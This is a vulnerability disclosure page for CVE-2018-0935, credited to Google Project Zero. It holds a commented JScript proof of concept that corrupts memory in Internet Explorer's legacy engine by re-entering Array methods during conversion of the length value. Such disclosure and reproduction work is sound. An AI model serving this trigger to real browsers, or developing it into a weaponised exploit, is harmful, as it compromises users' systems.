CVE-2018-0935

  • Report: Jan 2018
  • Fix: April 2018
  • Credit: Ivan Fratric (ifratric) of Google Project Zero

PoC (memory-corruption trigger for the legacy JScript engine in IE8 document mode — open it only in an isolated, disposable IE VM; it will crash or corrupt the browser process by design)

<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<!-- IE8 document mode plus language="Jscript.Encode" select the legacy JScript
     engine (jscript.dll) rather than Chakra; the trigger below targets that engine. -->
<script language="Jscript.Encode">

// Array-like plain object (NOT an Array). The Array.prototype generics at the
// bottom are applied to it via .call(), so the engine has to read vars.length itself.
var vars = {};

// Re-entrancy callback. It is installed as vars.length.toString (see below), so it
// runs in the middle of whatever Array.prototype method is converting `length` to a
// number. While that method is suspended it replaces every slot with a number, sets
// length to 0 and forces a GC, so any state the caller derived from vars before the
// conversion is stale when it resumes. (The exact engine-side consequence is not
// visible here; this is the bug the PoC relies on.)
function f() {
  alert('in f');
  for(var i=0; i<40000; i++) {
    vars[i] = 1;
  }
  vars.length = 0;
  CollectGarbage();
  alert(this);  // `this` is the array stored in vars.length (the toString receiver)
}

// Fill 40000 slots with fresh arrays, split around the length assignment. The
// counts are part of the trigger (presumably tuned to the engine's storage
// thresholds) — keep them as they are when reproducing.
for(var i=0; i<20000; i++) {
  vars[i] = [];
}
// length is an *array*, not a number: converting it forces a toString call,
// which is the hook that re-enters script during the Array method.
vars.length = [];
for(var i=20000; i<40000; i++) {
  vars[i] = [];
}

vars.length.toString = f;

// Any of these generics reads vars.length and so re-enters f(); uncomment exactly
// one to test that entry point.
//Array.prototype.join.call(vars);
//Array.prototype.reverse.call(vars);
//Array.prototype.sort.call(vars);
//Array.prototype.pop.call(vars);
//Array.prototype.push.call(vars, 1);
//Array.prototype.shift.call(vars);
//Array.prototype.unshift.call(vars, 1);
//Array.prototype.slice.call(vars, 1);
Array.prototype.splice.call(vars, 1, 1);

// Reached only if the call above returned normally, i.e. the trigger did not fire
// (unaffected or patched engine).
alert('failed');

</script>

Reference